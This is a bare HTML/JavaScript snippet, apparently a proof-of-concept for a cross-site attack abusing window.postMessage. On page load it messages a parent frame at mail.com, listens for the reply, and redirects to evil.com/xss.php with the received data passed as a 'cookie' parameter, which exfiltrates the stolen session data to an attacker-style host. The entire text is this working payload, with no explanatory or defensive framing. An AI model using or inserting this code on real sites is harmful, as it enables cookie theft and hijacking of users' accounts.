<script type="text/javascript">
window.onload = function() {
    window.addEventListener('message', function(e) {
        window.location.href='http://evil.com/xss.php?cookie='+e.data;
    });
    window.parent.postMessage('hello', 'http://mail.com');
};
</script>